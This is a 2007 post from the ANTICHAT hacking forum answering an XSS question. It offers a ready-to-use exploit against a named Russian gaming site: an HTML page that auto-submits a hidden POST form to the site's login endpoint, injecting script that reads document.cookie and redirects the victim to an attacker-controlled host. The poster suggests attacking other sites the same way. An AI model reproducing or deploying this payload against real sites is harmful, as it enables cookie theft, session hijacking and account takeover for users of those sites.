HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Forum for discussion of ANTICHAT
Перезагрузить страницу another question for xss
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #6  
Старый 16.11.2007, 21:31
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
С нами: 10638498

Репутация: 2033
Cool
http://www.proplay.ru/

- method GET not supported
- no referer-control


http://yourhost.xz/g.html - link with XSS-exploit

file g.html

Код:
<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>
redirect -->> q.html with any content

Another site -->> by analogy
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
noob question - SQL GaLLe0n PHP 6 04.11.2006 21:18
Question about c99 shell core Forum for discussion of ANTICHAT 1 24.05.2006 18:20
question ShitHappens Уязвимости Mail-сервис 34 23.03.2006 14:54
ipb question caffine2 Forum for discussion of ANTICHAT 4 27.12.2005 21:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.